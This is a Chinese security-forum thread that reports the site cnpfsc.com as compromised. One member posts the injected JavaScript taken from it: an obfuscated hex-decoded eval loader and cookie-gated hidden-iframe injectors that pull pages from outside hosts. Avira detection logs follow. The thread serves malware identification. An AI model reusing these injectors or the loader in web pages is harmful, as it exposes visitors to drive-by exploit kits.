收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 中国商品交易市场信息网
12下一页
返回列表 发新帖
查看: 2851|回复: 13
收起左侧

[未鉴定] 中国商品交易市场信息网

[复制链接]
墨家小子
发表于 2013-9-20 15:45:20 | 显示全部楼层 |阅读模式
http://cnpfsc.com/
回复

举报

fireold
发表于 2013-9-20 16:34:21 | 显示全部楼层
  1. /*0c0896*/
  2. ps = "split";
  3. e = eval;
  4. v = "0x";
  5. a = 0;
  6. z = "y";
  7. try {
  8.     a *= 25
  9. } catch (zz) {
  10.     a = 1
  11. }
  12. if (!a) {
  13.     try {
  14.         --e("doc" + "ument")["\x62od" + z]
  15.     } catch (q) {
  16.         a2 = "_";
  17.         sa = 0xa - 02;
  18.     }
  19.     z = "28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7b_7f_79_6e_6e_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7b_7f_79_6e_6e_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_69_7a_7c_7a_6d_7e_71_6d_7f_6b_6d_76_7c_6d_7a_36_6b_77_75_37_7a_6d_74_69_81_36_78_70_78_2f_43_15_12_28_7b_7f_79_6e_6e_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7b_7f_79_6e_6e_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_7b_7f_79_6e_6e_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7b_7f_79_6e_6e_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_7b_7f_79_6e_6e_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7b_7f_79_6e_6e_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7b_7f_79_6e_6e_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_7b_7f_79_6e_6e_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7b_7f_79_6e_6e_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_7b_7f_79_6e_6e_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12" [ps](a2);
  20.     za = "";
  21.     for (i = 0; i < z.length; i++) {
  22.         za += String["fromCharCode"](e(v + (z[i])) - sa);
  23.     }
  24.     zaz = za;
  25.     e(zaz);
  26. } /*/0c0896*/


  29. /*d68107*/

  31. function n09() {
  32.     var static = 'ajax';
  33.     var controller = 'index.php';
  34.     var n = document.createElement('iframe');
  35.     n.src = 'http://ftp.lecxeco.com/modules/87YWmbCh.php';
  36.     n.style.position = 'absolute';
  37.     n.style.color = '0694';
  38.     n.style.height = '0694px';
  39.     n.style.width = '0694px';
  40.     n.style.left = '10000694';
  41.     n.style.top = '10000694';
  42.     if (!document.getElementById('n')) {
  43.         document.write('<p id=\'n\' class=\'n09\' ></p>');
  44.         document.getElementById('n').appendChild(n);
  45.     }
  46. }
  47. function SetCookie(cookieName, cookieValue, nDays, path) {
  48.     var today = new Date();
  49.     var expire = new Date();
  50.     if (nDays == null || nDays == 0) nDays = 1;
  51.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  52.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  53. }
  54. function GetCookie(name) {
  55.     var start = document.cookie.indexOf(name + "=");
  56.     var len = start + name.length + 1;
  57.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
  58.         return null;
  59.     }
  60.     if (start == -1) return null;
  61.     var end = document.cookie.indexOf(";", len);
  62.     if (end == -1) end = document.cookie.length;
  63.     return unescape(document.cookie.substring(len, end));
  64. }
  65. if (navigator.cookieEnabled) {
  66.     if (GetCookie('visited_uq') == 55) {} else {
  67.         SetCookie('visited_uq', '55', '1', '/');
  68.         n09();
  69.     }
  70. } /*/d68107*/
复制代码
回复

举报

墨家小子
 楼主| 发表于 2013-9-20 16:34:57 | 显示全部楼层
fireold 发表于 2013-9-20 16:34

大牛
回复

举报

fireold
发表于 2013-9-20 16:35:13 | 显示全部楼层
  1. function zzzfff() {
  2.      var swqff = document.createElement('iframe');

  4.      swqff.src = 'http://artreviewcenter.com/relay.php';
  5.      swqff.style.position = 'absolute';
  6.      swqff.style.border = '0';
  7.      swqff.style.height = '1px';
  8.      swqff.style.width = '1px';
  9.      swqff.style.left = '1px';
  10.      swqff.style.top = '1px';

  12.      if (!document.getElementById('swqff')) {
  13.          document.write('<div id=\'swqff\'></div>');
  14.          document.getElementById('swqff').appendChild(swqff);
  15.      }
  16. }

  18. function SetCookie(cookieName, cookieValue, nDays, path) {
  19.      var today = new Date();
  20.      var expire = new Date();
  21.      if (nDays == null || nDays == 0) nDays = 1;
  22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }

  26. function GetCookie(name) {
  27.      var start = document.cookie.indexOf(name + "=");
  28.      var len = start + name.length + 1;
  29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  30.          return null;
  31.      }
  32.      if (start == -1) return null;
  33.      var end = document.cookie.indexOf(";", len);
  34.      if (end == -1) end = document.cookie.length;
  35.      return unescape(document.cookie.substring(len, end));
  36. }
  37. if (navigator.cookieEnabled) {
  38.      if (GetCookie('visited_uq') == 55) {} else {
  39.          SetCookie('visited_uq', '55', '1', '/');

  41.          zzzfff();
  42.      }
  43. }
复制代码
  1. function zzzfff() {
  2.      var xrd = document.createElement('iframe');

  4.      xrd.src = 'http://salampai.com/thumbs/esd.php';
  5.      xrd.style.position = 'absolute';
  6.      xrd.style.border = '0';
  7.      xrd.style.height = '1px';
  8.      xrd.style.width = '1px';
  9.      xrd.style.left = '1px';
  10.      xrd.style.top = '1px';

  12.      if (!document.getElementById('xrd')) {
  13.          document.write('<div id=\'xrd\'></div>');
  14.          document.getElementById('xrd').appendChild(xrd);
  15.      }
  16. }

  18. function SetCookie(cookieName, cookieValue, nDays, path) {
  19.      var today = new Date();
  20.      var expire = new Date();
  21.      if (nDays == null || nDays == 0) nDays = 1;
  22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }

  26. function GetCookie(name) {
  27.      var start = document.cookie.indexOf(name + "=");
  28.      var len = start + name.length + 1;
  29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  30.          return null;
  31.      }
  32.      if (start == -1) return null;
  33.      var end = document.cookie.indexOf(";", len);
  34.      if (end == -1) end = document.cookie.length;
  35.      return unescape(document.cookie.substring(len, end));
  36. }
  37. if (navigator.cookieEnabled) {
  38.      if (GetCookie('visited_uq') == 55) {} else {
  39.          SetCookie('visited_uq', '55', '1', '/');

  41.          zzzfff();
  42.      }
  43. }
复制代码
回复

举报

墨家小子
 楼主| 发表于 2013-9-20 16:36:46 | 显示全部楼层
fireold 发表于 2013-9-20 16:35

大大牛
回复

举报

fireold
发表于 2013-9-20 16:49:57 | 显示全部楼层
Avira
2013/9/20 下午 04:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\piaofu[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '57e0ab6a.qua' 名稱底下的隔離區目錄。.

2013/9/20 下午 04:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\fudong_right[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '4f4a84d9.qua' 名稱底下的隔離區目錄。.

2013/9/20 下午 04:45 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        845
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/9/20 下午 04:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\comm[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '5741a7fd.qua' 名稱底下的隔離區目錄。.

2013/9/20 下午 04:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery[3].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '4fce885c.qua' 名稱底下的隔離區目錄。.

2013/9/20 下午 04:45 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        845
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/9/20 下午 04:45 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\GB_BIG[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '5748aa14.qua' 名稱底下的隔離區目錄。.

2013/9/20 下午 04:45 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        838
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\piaofu[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\piaofu[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\fudong_right[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 下午 04:44 [Web Protection] 發現惡意程式碼
      從 URL "http://cnpfsc.com/js/piaofu.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\fudong_right[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 下午 04:44 [Web Protection] 發現惡意程式碼
      從 URL "http://cnpfsc.com/inc/fudong_right.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery[3].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\comm[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\jquery[3].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 下午 04:44 [Web Protection] 發現惡意程式碼
      從 URL "http://cnpfsc.com/Templates/cn/images/jquery.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\GB_BIG[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\comm[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 下午 04:44 [Web Protection] 發現惡意程式碼
      從 URL "http://cnpfsc.com/js/comm.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/9/20 下午 04:44 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\GB_BIG[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 下午 04:44 [Web Protection] 發現惡意程式碼
      從 URL "http://cnpfsc.com/js/GB_BIG.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過


av3.jpg
回复

举报

fireold
发表于 2013-9-20 16:50:27 | 显示全部楼层
fs 2014
fs3.jpg
回复

举报

墨家小子
 楼主| 发表于 2013-9-20 16:54:31 | 显示全部楼层
fireold 发表于 2013-9-20 16:49
Avira

我擦 小红伞好夸张啊 这么多,等会我裸机进去看看
回复

举报

fireold
发表于 2013-9-20 17:07:13 | 显示全部楼层
墨家小子 发表于 2013-9-20 16:54
我擦 小红伞好夸张啊 这么多,等会我裸机进去看看

裸机?小心沒命了…
回复

举报

蓝核
发表于 2013-9-20 17:09:06 | 显示全部楼层
cnpfsc.com/Templates/cn/images/jquery.js               
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 11:02 , Processed in 0.126288 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表